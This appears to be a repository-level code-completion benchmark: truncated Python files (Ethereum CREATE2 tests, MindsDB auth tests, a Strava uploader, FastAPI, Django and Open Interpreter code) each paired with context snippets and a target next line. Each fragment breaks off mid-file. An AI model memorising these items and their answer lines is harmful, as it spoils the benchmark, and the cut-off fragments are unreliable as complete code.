"0x60f3f640a8508fc6a86d45df051962668e1e8ac7"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x00000000000000000000000000000000deadbeef",
salt=3405691582,
initialisation_code="deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
),
"0x1d8bfdc5d46dc4f61d6b6115972536ebe6a8854c"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code=""
),
"0xe33c0c7f7df4809055c3eba6c09cfe4baf1bd9e0"
)
class OpcodeTestCase(unittest.TestCase):
def setUp(self):
|
class UtilTestCase(unittest.TestCase):
def test_get_create_contract_address(self):
sender_address = "0x6ac7ea33f8831ea9dcc53393aaa88b25a785dbf0"
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=0),
"0xcd234a471b72ba2f1ccf0a70fcaba648a5eecd8d")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=1),
"0x343c43a37d37dff08ae8c4a11544c718abb4fcf8")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=2),
"0xf778b86fa74e846c4f0a1fbd1335fe81c00a0c91")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=3),
"0xfffd933a0bc612844eaf0c6fe3e5b8e9b6c1d19c")
def test_get_create2_contract_address(self):
# https://eips.ethereum.org/EIPS/eip-1014
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code="00"
),
"0x4d1a2e2bb4f88f0250f26ffff098b0b30b26bf38"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0xdeadbeef00000000000000000000000000000000",
salt=0,
initialisation_code="00"
),
"0xb928f69bb1d91cd65274e3c79d8986362984fda3"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0xdeadbeef00000000000000000000000000000000",
salt=1455368932401306996839762510191304720241787928576,
initialisation_code="00"
),
"0xd04116cdd17bebe565eb2422f2497e06cc1c9833"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code="deadbeef"
),
"0x70f2b2914a2a4b783faefb75f459a580616fcb5e"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x00000000000000000000000000000000deadbeef",
salt=3405691582,
initialisation_code="deadbeef"
),
"0x60f3f640a8508fc6a86d45df051962668e1e8ac7"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x00000000000000000000000000000000deadbeef",
salt=3405691582,
initialisation_code="deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
),
"0x1d8bfdc5d46dc4f61d6b6115972536ebe6a8854c"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code=""
),
"0xe33c0c7f7df4809055c3eba6c09cfe4baf1bd9e0"
)
class OpcodeTestCase(unittest.TestCase):
def setUp(self): | self.evm = EVM() | 0 | 2023-11-10 14:13:05+00:00 | 2k |
AvaterClasher/eli | tests/middlewares/test_mindsdb.py | [
{
"identifier": "CredentialsError",
"path": "eli/exceptions/auth.py",
"snippet": "class CredentialsError(Exception): ..."
},
{
"identifier": "NetworkError",
"path": "eli/exceptions/connection.py",
"snippet": "class NetworkError(Exception): ..."
},
{
"identifier": "MINDSDB_HOST",
... | import pytest
from pandas import DataFrame
from unittest.mock import patch, MagicMock
from eli.exceptions.auth import CredentialsError
from eli.exceptions.connection import NetworkError
from requests.exceptions import HTTPError, ConnectionError
from eli.constants.service import MINDSDB_HOST
from eli.middlewares.mindsdb import MindsDB | 726 |
@patch('mindsdb_sdk.connect')
def test_authenticate(mock_connect):
email = 'test@test.com'
password = 'testpassword'
mock_server = MagicMock()
mock_connect.return_value = mock_server
mindsdb = MindsDB(email, password)
mindsdb.authenticate()
mock_connect.assert_called_once_with(MINDSDB_HOST, login=email, password=password)
mock_server.list_databases.assert_called_once()
assert mindsdb.is_authenticated is True
def test_authenticate_incorrect_password():
mindsdb = MindsDB('test@test.com', 'testpassword')
with pytest.raises(CredentialsError):
with patch('mindsdb_sdk.connect', side_effect=HTTPError):
mindsdb.authenticate()
def test_authenticate_network_error():
mindsdb = MindsDB('test@test.com', 'testpassword')
|
@patch('mindsdb_sdk.connect')
def test_authenticate(mock_connect):
email = 'test@test.com'
password = 'testpassword'
mock_server = MagicMock()
mock_connect.return_value = mock_server
mindsdb = MindsDB(email, password)
mindsdb.authenticate()
mock_connect.assert_called_once_with(MINDSDB_HOST, login=email, password=password)
mock_server.list_databases.assert_called_once()
assert mindsdb.is_authenticated is True
def test_authenticate_incorrect_password():
mindsdb = MindsDB('test@test.com', 'testpassword')
with pytest.raises(CredentialsError):
with patch('mindsdb_sdk.connect', side_effect=HTTPError):
mindsdb.authenticate()
def test_authenticate_network_error():
mindsdb = MindsDB('test@test.com', 'testpassword')
| with pytest.raises(NetworkError): | 1 | 2023-11-16 13:31:55+00:00 | 2k |
xduck7/AI_Spam_checker | start.py | [
{
"identifier": "do_prediction",
"path": "predict.py",
"snippet": "def do_prediction(message):\n\n #подгрузка модели\n loaded_model = load_model('./Model/your_model.h5')\n loaded_label_encoder = joblib.load('./Model/label_encoder.pkl')\n loaded_vectorizer = joblib.load('./Model/vectorizer.pk... | import tkinter as tk
from predict import do_prediction
from rqst import add_report
from rqst import first_start | 899 |
root= tk.Tk()
root.title("SPAM CHECKER")
root.geometry("500x600")
root.resizable(width=True, height=True)
def get_input():
inputValue=textBox.get("1.0","end-1c")
print(inputValue)
textBox.delete('1.0', 'end')
return inputValue
def union():
msg = get_input()
result = do_prediction(msg)
if (result == 1):
final_opinion = "✅"
else:
final_opinion = "❌"
#final_opinion = ("Spam result is " + str(result))
label_result.configure(text=final_opinion)
label_result.pack()
add_report(str(msg), str(result[0][0]))
image = tk.PhotoImage(file='./Image/logo.png')
smaller_image = image.subsample(5, 5)
panel = tk.Label(root, image = smaller_image)
textBox= tk.Text(root,
height=3, width=80,
borderwidth=5,
font="Arial 18")
panel_text = tk.Label(text="Spam checker",
font="Arial 16")
panel_values = tk.Label(text="✅ = spam \n ❌ = NOT spam",
font="Arial 16")
buttonCommit= tk.Button(root,
height=1, width=10,
text="Check spam",font='Arial 20',
command=lambda: union(),
borderwidth=5)
label_result = tk.Label(text="Loading...", font="Arial 20")
filler = tk.Label(text=' ')
|
root= tk.Tk()
root.title("SPAM CHECKER")
root.geometry("500x600")
root.resizable(width=True, height=True)
def get_input():
inputValue=textBox.get("1.0","end-1c")
print(inputValue)
textBox.delete('1.0', 'end')
return inputValue
def union():
msg = get_input()
result = do_prediction(msg)
if (result == 1):
final_opinion = "✅"
else:
final_opinion = "❌"
#final_opinion = ("Spam result is " + str(result))
label_result.configure(text=final_opinion)
label_result.pack()
add_report(str(msg), str(result[0][0]))
image = tk.PhotoImage(file='./Image/logo.png')
smaller_image = image.subsample(5, 5)
panel = tk.Label(root, image = smaller_image)
textBox= tk.Text(root,
height=3, width=80,
borderwidth=5,
font="Arial 18")
panel_text = tk.Label(text="Spam checker",
font="Arial 16")
panel_values = tk.Label(text="✅ = spam \n ❌ = NOT spam",
font="Arial 16")
buttonCommit= tk.Button(root,
height=1, width=10,
text="Check spam",font='Arial 20',
command=lambda: union(),
borderwidth=5)
label_result = tk.Label(text="Loading...", font="Arial 20")
filler = tk.Label(text=' ')
| first_start() | 2 | 2023-11-18 17:11:44+00:00 | 2k |
TheJacksonLaboratory/geneweaver-boolean-algebra | tests/unit/test_boolean_algebra_tool.py | [
{
"identifier": "BOOLEAN_GENESET_GENES_0",
"path": "tests/unit/const.py",
"snippet": "BOOLEAN_GENESET_GENES_0 = {\n GeneValue(symbol=\"A\", value=1),\n GeneValue(symbol=\"B\", value=1),\n GeneValue(symbol=\"C\", value=1),\n GeneValue(symbol=\"D\", value=1),\n}"
},
{
"identifier": "BO... | from pathlib import Path
from geneweaver.tools.boolean_algebra.tool import (
BooleanAlgebra,
BooleanAlgebraInput,
BooleanAlgebraOutput,
BooleanAlgebraType,
WorkflowType,
)
from tests.unit.const import (
BOOLEAN_GENESET_GENES_0,
BOOLEAN_GENESET_GENES_1,
BOOLEAN_GENESET_GENES_2,
DIFF_BOOLEAN_GENESET_GENES_0_1_2,
INT_BOOLEAN_GENESET_GENES_0_1,
INT_BOOLEAN_GENESET_GENES_0_1_2,
INT_BOOLEAN_GENESET_GENES_0_2,
INT_BOOLEAN_GENESET_GENES_1_2,
UNION_BOOLEAN_GENESET_GENES_0_1,
)
import pytest | 850 | """Test the boolean algebra tool class."""
@pytest.mark.parametrize(
("input_value", "expected"),
[
# Union
(
BooleanAlgebraInput(
type=BooleanAlgebraType.UNION,
| """Test the boolean algebra tool class."""
@pytest.mark.parametrize(
("input_value", "expected"),
[
# Union
(
BooleanAlgebraInput(
type=BooleanAlgebraType.UNION, | input_genesets=[BOOLEAN_GENESET_GENES_0, BOOLEAN_GENESET_GENES_1], | 1 | 2023-11-15 17:53:26+00:00 | 2k |
jpcadena/fastapi-boilerplate | app/core/lifecycle.py | [
{
"identifier": "RedisConnectionManager",
"path": "app/api/deps.py",
"snippet": "class RedisConnectionManager:\n \"\"\"\n Redis connection manager class\n \"\"\"\n\n def __init__(self, auth_settings: AuthSettings):\n self.url: str = f\"{auth_settings.REDIS_DATABASE_URI}\"\n sel... | import logging
from contextlib import asynccontextmanager
from typing import Any, AsyncGenerator
from fastapi import FastAPI
from app.api.deps import RedisConnectionManager
from app.config.config import get_auth_settings, get_init_settings, get_settings
from app.crud.user import get_user_repository
from app.db.init_db import init_db
from app.services.infrastructure.ip_blacklist import get_ip_blacklist_service | 1,182 | """
A module for lifecycle in the app-core package.
"""
logger: logging.Logger = logging.getLogger(__name__)
@asynccontextmanager
async def lifespan(application: FastAPI) -> AsyncGenerator[Any, None]:
"""
The lifespan of the application
:param application: The FastAPI application
:type application: FastAPI
:return: An asynchronous generator for the application
:rtype: AsyncGenerator[Any, None]
"""
logger.info("Starting API...")
try:
| """
A module for lifecycle in the app-core package.
"""
logger: logging.Logger = logging.getLogger(__name__)
@asynccontextmanager
async def lifespan(application: FastAPI) -> AsyncGenerator[Any, None]:
"""
The lifespan of the application
:param application: The FastAPI application
:type application: FastAPI
:return: An asynchronous generator for the application
:rtype: AsyncGenerator[Any, None]
"""
logger.info("Starting API...")
try: | application.state.settings = get_settings() | 3 | 2023-11-17 00:32:32+00:00 | 2k |
juliusmarkwei/auth-system | backend/accounts/views.py | [
{
"identifier": "UserSerializer",
"path": "backend/accounts/serializers.py",
"snippet": "class UserSerializer(serializers.ModelSerializer):\n date_joined = serializers.ReadOnlyField()\n password = serializers.CharField(write_only=True)\n class Meta(object):\n model = User\n fields... | from rest_framework.views import APIView
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework import status
from .serializers import UserSerializer
from .models import User, EmailConfirmationToken
from .utils import send_confirmation_email | 1,123 |
class UserAPIView(APIView):
permission_classes = [AllowAny,]
def post(self, request):
user = request.data
serializer = UserSerializer(data=user)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def get_queryset(self):
return User.objects.all()
def get(self, request, *args, **kwargs):
users = self.get_queryset()
serializer = UserSerializer(users, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
def put(self, request, *args, **kwargs):
serializer_data = request.data.get("user", {})
serializer = UserSerializer(request.user, data=serializer_data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
class UserInformationAPIView(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, *args, **kwargs):
user = request.user
email = user.email
is_verified = user.is_verified
payload = {"email": email, "is_verified": is_verified}
return Response(data=payload, status=status.HTTP_200_OK)
class SendEmailConfirmationTokenAPIView(APIView):
permission_classes = [IsAuthenticated]
def post(self, request, format=None):
user = request.user
token = EmailConfirmationToken.objects.create(user=user)
|
class UserAPIView(APIView):
permission_classes = [AllowAny,]
def post(self, request):
user = request.data
serializer = UserSerializer(data=user)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def get_queryset(self):
return User.objects.all()
def get(self, request, *args, **kwargs):
users = self.get_queryset()
serializer = UserSerializer(users, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
def put(self, request, *args, **kwargs):
serializer_data = request.data.get("user", {})
serializer = UserSerializer(request.user, data=serializer_data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
class UserInformationAPIView(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, *args, **kwargs):
user = request.user
email = user.email
is_verified = user.is_verified
payload = {"email": email, "is_verified": is_verified}
return Response(data=payload, status=status.HTTP_200_OK)
class SendEmailConfirmationTokenAPIView(APIView):
permission_classes = [IsAuthenticated]
def post(self, request, format=None):
user = request.user
token = EmailConfirmationToken.objects.create(user=user) | send_confirmation_email(email=user.email, token_id=token.pk, user_id=user.pk) | 3 | 2023-11-17 17:55:59+00:00 | 2k |
vitant-lang/CBAM-ASPP | nets/deeplabv3_plus.py | [
{
"identifier": "xception",
"path": "nets/xception.py",
"snippet": "def xception(pretrained=True, downsample_factor=16):\n model = Xception(downsample_factor=downsample_factor)\n if pretrained:\n model.load_state_dict(load_url('https://github.com/bubbliiiing/deeplabv3-plus-pytorch/releases/... | import torch
import torch.nn as nn
import torch.nn.functional as F
from .xception import xception
from .mobilenetv2 import mobilenetv2
from .attention import se_block,CBAM,eca_block
from functools import partial | 795 |
atteionb=[se_block,CBAM,eca_block]
class MobileNetV2(nn.Module):
def __init__(self, downsample_factor=8, pretrained=True):
super(MobileNetV2, self).__init__()
|
atteionb=[se_block,CBAM,eca_block]
class MobileNetV2(nn.Module):
def __init__(self, downsample_factor=8, pretrained=True):
super(MobileNetV2, self).__init__()
| model = mobilenetv2(pretrained) | 1 | 2023-11-17 13:25:28+00:00 | 2k |
JiNanPiWang/apple_health_export_gpx_add_heartrate | src/strava_gpx_uploader.py | [
{
"identifier": "RateLimitException",
"path": "utils/exceptions.py",
"snippet": "class RateLimitException(Exception):\n def __init__(self, message=\"API rate limit exceeded\"):\n self.message = message\n super().__init__(self.message)"
},
{
"identifier": "NoInternetException",
... | import json
import os
import time
from stravalib.util.limiter import RateLimiter, XRateLimitRule
from stravalib.client import Client, exc
from utils.exceptions import RateLimitException, NoInternetException | 830 |
def get_strava_client(access_token):
token = access_token
rate_limiter = RateLimiter()
rate_limiter.rules.append(XRateLimitRule(
{'short': {'usageFieldIndex': 0, 'usage': 0,
# 60s * 15 = 15 min
'limit': 100, 'time': (60 * 15),
'lastExceeded': None, },
'long': {'usageFieldIndex': 1, 'usage': 0,
# 60s * 60m * 24 = 1 day
'limit': 1000, 'time': (60 * 60 * 24),
'lastExceeded': None}}))
client = Client(rate_limiter=rate_limiter)
client.access_token = token
return client
class StravaGpxUploader:
def __init__(self, file_path: str, activity_type):
with open("config/strava_config.json", 'r') as f:
strava_config = json.load(f)
# Edit access_token in the strava_config.json or edit here
# like access_token = '***'
self.file_path = file_path
self.access_token = strava_config["access_token"]
self.activity_type = activity_type
self.client = get_strava_client(self.access_token)
def get_athlete_name(self):
athlete = None
for i in range(2):
try:
athlete = self.client.get_athlete()
except exc.RateLimitExceeded as err:
if i > 0:
raise RateLimitException("Daily Rate limit exceeded")
print("Rate limit exceeded in connecting - Retrying strava connection in 15 minutes")
time.sleep(900)
continue
break
print("Now authenticated for " + athlete.firstname + " " + athlete.lastname)
# client, gpxfile, strava_activity_type, notes
def upload_gpx(self):
gpxfile = self.file_path
if not os.path.isfile(gpxfile):
print("No file found for " + gpxfile + "!")
return False
print("Uploading " + gpxfile)
for i in range(2):
try:
# 如果上传成功,则会直接到底下break
upload = self.client.upload_activity(
activity_file=open(gpxfile, 'r'),
data_type='gpx',
description='',
activity_type=self.activity_type
)
except exc.RateLimitExceeded as err:
# 第二次循环才会直接到这里
# 这里是说今天已经超过了限制,退出程序
if i > 0:
raise RateLimitException("Daily Rate limit exceeded, please try tomorrow")
# 第一次循环会直接到这里
# 这里是说这一次超过了限制,等待15分钟
print("Rate limit exceeded in uploading - auto pausing uploads for 15 minutes to avoid rate-limit")
time.sleep(900)
continue
except ConnectionError as err:
|
def get_strava_client(access_token):
token = access_token
rate_limiter = RateLimiter()
rate_limiter.rules.append(XRateLimitRule(
{'short': {'usageFieldIndex': 0, 'usage': 0,
# 60s * 15 = 15 min
'limit': 100, 'time': (60 * 15),
'lastExceeded': None, },
'long': {'usageFieldIndex': 1, 'usage': 0,
# 60s * 60m * 24 = 1 day
'limit': 1000, 'time': (60 * 60 * 24),
'lastExceeded': None}}))
client = Client(rate_limiter=rate_limiter)
client.access_token = token
return client
class StravaGpxUploader:
def __init__(self, file_path: str, activity_type):
with open("config/strava_config.json", 'r') as f:
strava_config = json.load(f)
# Edit access_token in the strava_config.json or edit here
# like access_token = '***'
self.file_path = file_path
self.access_token = strava_config["access_token"]
self.activity_type = activity_type
self.client = get_strava_client(self.access_token)
def get_athlete_name(self):
athlete = None
for i in range(2):
try:
athlete = self.client.get_athlete()
except exc.RateLimitExceeded as err:
if i > 0:
raise RateLimitException("Daily Rate limit exceeded")
print("Rate limit exceeded in connecting - Retrying strava connection in 15 minutes")
time.sleep(900)
continue
break
print("Now authenticated for " + athlete.firstname + " " + athlete.lastname)
# client, gpxfile, strava_activity_type, notes
def upload_gpx(self):
gpxfile = self.file_path
if not os.path.isfile(gpxfile):
print("No file found for " + gpxfile + "!")
return False
print("Uploading " + gpxfile)
for i in range(2):
try:
# 如果上传成功,则会直接到底下break
upload = self.client.upload_activity(
activity_file=open(gpxfile, 'r'),
data_type='gpx',
description='',
activity_type=self.activity_type
)
except exc.RateLimitExceeded as err:
# 第二次循环才会直接到这里
# 这里是说今天已经超过了限制,退出程序
if i > 0:
raise RateLimitException("Daily Rate limit exceeded, please try tomorrow")
# 第一次循环会直接到这里
# 这里是说这一次超过了限制,等待15分钟
print("Rate limit exceeded in uploading - auto pausing uploads for 15 minutes to avoid rate-limit")
time.sleep(900)
continue
except ConnectionError as err: | raise NoInternetException("No Internet connection: {}".format(err)) | 1 | 2023-11-14 01:50:02+00:00 | 2k |
rgrizzell/CircuitPython_LILYGO_T-Deck | examples/lilygo_tdeck_custom_keyboard.py | [
{
"identifier": "Keyboard",
"path": "lilygo_tdeck.py",
"snippet": "class Keyboard:\n \"\"\"Controls the keyboard peripheral. This class can be extended to support additional\n functionality if the keyboard is utilizing custom firmware.\n\n :param i2c: Object representing the I2C interface used ... | import time
import board
from lilygo_tdeck import Keyboard, TDeck | 1,310 | # SPDX-FileCopyrightText: 2017 Scott Shawcroft, written for Adafruit Industries
# SPDX-FileCopyrightText: Copyright (c) 2023 Robert Grizzell
#
# SPDX-License-Identifier: Unlicense
class MyCustomKeyboard(Keyboard):
def __init__(self, backlight: bool = True):
super().__init__(board.I2C())
self.backlight(backlight)
def backlight(self, state: bool = None, register: int = 0x1):
"""Send an I2C command to control the keyboard backlight.
Custom keyboard firmware is required for this to work.
"""
if state is None:
buf = bytearray(1)
else:
buf = bytearray(2)
buf[1] = int(state)
buf[0] = register
self._i2c.try_lock()
self._i2c.writeto(self._i2c_addr, buffer=buf)
self._i2c.unlock()
k = MyCustomKeyboard()
| # SPDX-FileCopyrightText: 2017 Scott Shawcroft, written for Adafruit Industries
# SPDX-FileCopyrightText: Copyright (c) 2023 Robert Grizzell
#
# SPDX-License-Identifier: Unlicense
class MyCustomKeyboard(Keyboard):
def __init__(self, backlight: bool = True):
super().__init__(board.I2C())
self.backlight(backlight)
def backlight(self, state: bool = None, register: int = 0x1):
"""Send an I2C command to control the keyboard backlight.
Custom keyboard firmware is required for this to work.
"""
if state is None:
buf = bytearray(1)
else:
buf = bytearray(2)
buf[1] = int(state)
buf[0] = register
self._i2c.try_lock()
self._i2c.writeto(self._i2c_addr, buffer=buf)
self._i2c.unlock()
k = MyCustomKeyboard() | t = TDeck(keyboard=k) | 1 | 2023-11-11 15:13:00+00:00 | 2k |
dataaug/open-interpreter-free | tests/test_interpreter.py | [
{
"identifier": "count_messages_tokens",
"path": "interpreter/utils/count_tokens.py",
"snippet": "def count_messages_tokens(messages=[], model=None):\n \"\"\"\n Count the number of tokens in a list of messages\n \"\"\"\n\n tokens_used = 0\n\n for message in messages:\n if isinstanc... | import os
import re
import time
import interpreter
from random import randint
from interpreter.utils.count_tokens import count_messages_tokens, count_tokens | 1,581 | Round to 2 decimal places.
""".strip()
messages = interpreter.chat(order_of_operations_message)
assert str(round(test_result, 2)) in messages[-1]["message"]
def test_delayed_exec():
interpreter.chat(
"""Can you write a single block of code and execute it that prints something, then delays 1 second, then prints something else? No talk just code. Thanks!"""
)
def test_nested_loops_and_multiple_newlines():
interpreter.chat(
"""Can you write a nested for loop in python and shell and run them? Don't forget to properly format your shell script and use semicolons where necessary. Also put 1-3 newlines between each line in the code. Only generate and execute the code. No explanations. Thanks!"""
)
def test_write_to_file():
interpreter.chat("""Write the word 'Washington' to a .txt file called file.txt""")
assert os.path.exists("file.txt")
interpreter.messages = [] # Just reset message history, nothing else for this test
messages = interpreter.chat(
"""Read file.txt in the current directory and tell me what's in it."""
)
assert "Washington" in messages[-1]["message"]
def test_markdown():
interpreter.chat(
"""Hi, can you test out a bunch of markdown features? Try writing a fenced code block, a table, headers, everything. DO NOT write the markdown inside a markdown code block, just write it raw."""
)
def test_generator():
start_of_message_emitted = False
end_of_message_emitted = False
start_of_code_emitted = False
end_of_code_emitted = False
executing_emitted = False
end_of_execution_emitted = False
for chunk in interpreter.chat("What's 38023*40334?", stream=True, display=False):
print(chunk)
if "start_of_message" in chunk:
start_of_message_emitted = True
if "end_of_message" in chunk:
end_of_message_emitted = True
if "start_of_code" in chunk:
start_of_code_emitted = True
if "end_of_code" in chunk:
end_of_code_emitted = True
if "executing" in chunk:
executing_emitted = True
if "end_of_execution" in chunk:
end_of_execution_emitted = True
assert start_of_message_emitted
assert end_of_message_emitted
assert start_of_code_emitted
assert end_of_code_emitted
assert executing_emitted
assert end_of_execution_emitted
def test_config_loading():
# because our test is running from the root directory, we need to do some
# path manipulation to get the actual path to the config file or our config
# loader will try to load from the wrong directory and fail
currentPath = os.path.dirname(os.path.abspath(__file__))
config_path = os.path.join(currentPath, "./config.test.yaml")
interpreter.extend_config(config_path=config_path)
# check the settings we configured in our config.test.yaml file
temperature_ok = interpreter.temperature == 0.25
model_ok = interpreter.model == "gpt-3.5-turbo"
debug_mode_ok = interpreter.debug_mode == True
assert temperature_ok and model_ok and debug_mode_ok
def test_system_message_appending():
ping_system_message = (
"Respond to a `ping` with a `pong`. No code. No explanations. Just `pong`."
)
ping_request = "ping"
pong_response = "pong"
interpreter.system_message += ping_system_message
messages = interpreter.chat(ping_request)
assert messages == [
{"role": "user", "message": ping_request},
{"role": "assistant", "message": pong_response},
]
def test_reset():
# make sure that interpreter.reset() clears out the messages Array
assert interpreter.messages == []
def test_token_counter():
system_tokens = count_tokens(
text=interpreter.system_message, model=interpreter.model
)
prompt = "How many tokens is this?"
prompt_tokens = count_tokens(text=prompt, model=interpreter.model)
messages = [
{"role": "system", "message": interpreter.system_message}
] + interpreter.messages
|
# this function will run before each test
# we're clearing out the messages Array so we can start fresh and reduce token usage
def setup_function():
interpreter.reset()
interpreter.temperature = 0
interpreter.auto_run = True
interpreter.model = "gpt-4"
interpreter.debug_mode = False
# this function will run after each test
# we're introducing some sleep to help avoid timeout issues with the OpenAI API
def teardown_function():
time.sleep(5)
def test_hello_world():
hello_world_response = "Hello, World!"
hello_world_message = f"Please reply with just the words {hello_world_response} and nothing else. Do not run code. No confirmation just the text."
messages = interpreter.chat(hello_world_message)
assert messages == [
{"role": "user", "message": hello_world_message},
{"role": "assistant", "message": hello_world_response},
]
def test_math():
# we'll generate random integers between this min and max in our math tests
min_number = randint(1, 99)
max_number = randint(1001, 9999)
n1 = randint(min_number, max_number)
n2 = randint(min_number, max_number)
test_result = n1 + n2 * (n1 - n2) / (n2 + n1)
order_of_operations_message = f"""
Please perform the calculation `{n1} + {n2} * ({n1} - {n2}) / ({n2} + {n1})` then reply with just the answer, nothing else. No confirmation. No explanation. No words. Do not use commas. Do not show your work. Just return the result of the calculation. Do not introduce the results with a phrase like \"The result of the calculation is...\" or \"The answer is...\"
Round to 2 decimal places.
""".strip()
messages = interpreter.chat(order_of_operations_message)
assert str(round(test_result, 2)) in messages[-1]["message"]
def test_delayed_exec():
interpreter.chat(
"""Can you write a single block of code and execute it that prints something, then delays 1 second, then prints something else? No talk just code. Thanks!"""
)
def test_nested_loops_and_multiple_newlines():
interpreter.chat(
"""Can you write a nested for loop in python and shell and run them? Don't forget to properly format your shell script and use semicolons where necessary. Also put 1-3 newlines between each line in the code. Only generate and execute the code. No explanations. Thanks!"""
)
def test_write_to_file():
interpreter.chat("""Write the word 'Washington' to a .txt file called file.txt""")
assert os.path.exists("file.txt")
interpreter.messages = [] # Just reset message history, nothing else for this test
messages = interpreter.chat(
"""Read file.txt in the current directory and tell me what's in it."""
)
assert "Washington" in messages[-1]["message"]
def test_markdown():
interpreter.chat(
"""Hi, can you test out a bunch of markdown features? Try writing a fenced code block, a table, headers, everything. DO NOT write the markdown inside a markdown code block, just write it raw."""
)
def test_generator():
start_of_message_emitted = False
end_of_message_emitted = False
start_of_code_emitted = False
end_of_code_emitted = False
executing_emitted = False
end_of_execution_emitted = False
for chunk in interpreter.chat("What's 38023*40334?", stream=True, display=False):
print(chunk)
if "start_of_message" in chunk:
start_of_message_emitted = True
if "end_of_message" in chunk:
end_of_message_emitted = True
if "start_of_code" in chunk:
start_of_code_emitted = True
if "end_of_code" in chunk:
end_of_code_emitted = True
if "executing" in chunk:
executing_emitted = True
if "end_of_execution" in chunk:
end_of_execution_emitted = True
assert start_of_message_emitted
assert end_of_message_emitted
assert start_of_code_emitted
assert end_of_code_emitted
assert executing_emitted
assert end_of_execution_emitted
def test_config_loading():
# because our test is running from the root directory, we need to do some
# path manipulation to get the actual path to the config file or our config
# loader will try to load from the wrong directory and fail
currentPath = os.path.dirname(os.path.abspath(__file__))
config_path = os.path.join(currentPath, "./config.test.yaml")
interpreter.extend_config(config_path=config_path)
# check the settings we configured in our config.test.yaml file
temperature_ok = interpreter.temperature == 0.25
model_ok = interpreter.model == "gpt-3.5-turbo"
debug_mode_ok = interpreter.debug_mode == True
assert temperature_ok and model_ok and debug_mode_ok
def test_system_message_appending():
ping_system_message = (
"Respond to a `ping` with a `pong`. No code. No explanations. Just `pong`."
)
ping_request = "ping"
pong_response = "pong"
interpreter.system_message += ping_system_message
messages = interpreter.chat(ping_request)
assert messages == [
{"role": "user", "message": ping_request},
{"role": "assistant", "message": pong_response},
]
def test_reset():
# make sure that interpreter.reset() clears out the messages Array
assert interpreter.messages == []
def test_token_counter():
system_tokens = count_tokens(
text=interpreter.system_message, model=interpreter.model
)
prompt = "How many tokens is this?"
prompt_tokens = count_tokens(text=prompt, model=interpreter.model)
messages = [
{"role": "system", "message": interpreter.system_message}
] + interpreter.messages
| system_token_test = count_messages_tokens( | 0 | 2023-11-16 03:10:42+00:00 | 2k |
TheJacksonLaboratory/geneweaver-client | tests/unit/utils/cli/prompt/pydantic/test_prompt_for_missing_fields.py | [
{
"identifier": "MOCK_EXISTING_COMBINATIONS",
"path": "tests/unit/utils/cli/prompt/pydantic/conftest.py",
"snippet": "MOCK_EXISTING_COMBINATIONS = [\n dict(e)\n for e in chain.from_iterable(\n combinations(MOCK_EXISTING_FIELDS, r)\n for r in range(len(MOCK_EXISTING_FIELDS) + 1)\n ... | from unittest.mock import Mock
from geneweaver.client.utils.cli.prompt.pydantic import prompt_for_missing_fields
from tests.unit.utils.cli.prompt.pydantic.conftest import (
MOCK_EXISTING_COMBINATIONS,
MOCK_MODEL_FIELD_COMBINATIONS,
MOCK_MODEL_FIELDS,
MockModel,
)
import pytest | 656 | """Test the prompt_for_missing_fields function."""
# We can't use every combination of fields because the number of combinations
# grows much too large to be practical.
# Instead, we use the first 25 and last 25 combinations.
@pytest.mark.parametrize(
"existing", MOCK_EXISTING_COMBINATIONS[:25] + MOCK_EXISTING_COMBINATIONS[-25:]
)
@pytest.mark.parametrize(
"exclude", MOCK_MODEL_FIELD_COMBINATIONS[:25] + MOCK_MODEL_FIELD_COMBINATIONS[-25:]
)
@pytest.mark.parametrize("prompt_to_keep_existing", [True, False])
def test_prompt_for_missing(existing, exclude, prompt_to_keep_existing, monkeypatch):
"""Test the prompt_for_missing_fields function."""
mock_prompt_to_keep = Mock()
mock_prompt_for_field_by_type = Mock()
monkeypatch.setattr(
"geneweaver.client.utils.cli.prompt.pydantic.prompt_to_keep_field",
mock_prompt_to_keep,
)
monkeypatch.setattr(
"geneweaver.client.utils.cli.prompt.pydantic.prompt_for_field_by_type",
mock_prompt_for_field_by_type,
)
prompt_for_missing_fields(MockModel, existing, exclude, prompt_to_keep_existing)
# We should prompt for every field in `existing` that is not in `exclude`.
if prompt_to_keep_existing and len(existing) > 0:
assert mock_prompt_to_keep.call_count == len(set(existing.keys()) - exclude)
# We should prompt for every field in `MockModel` that is not in
# `existing` or `exclude`.
assert mock_prompt_for_field_by_type.call_count == len(
| """Test the prompt_for_missing_fields function."""
# We can't use every combination of fields because the number of combinations
# grows much too large to be practical.
# Instead, we use the first 25 and last 25 combinations.
@pytest.mark.parametrize(
"existing", MOCK_EXISTING_COMBINATIONS[:25] + MOCK_EXISTING_COMBINATIONS[-25:]
)
@pytest.mark.parametrize(
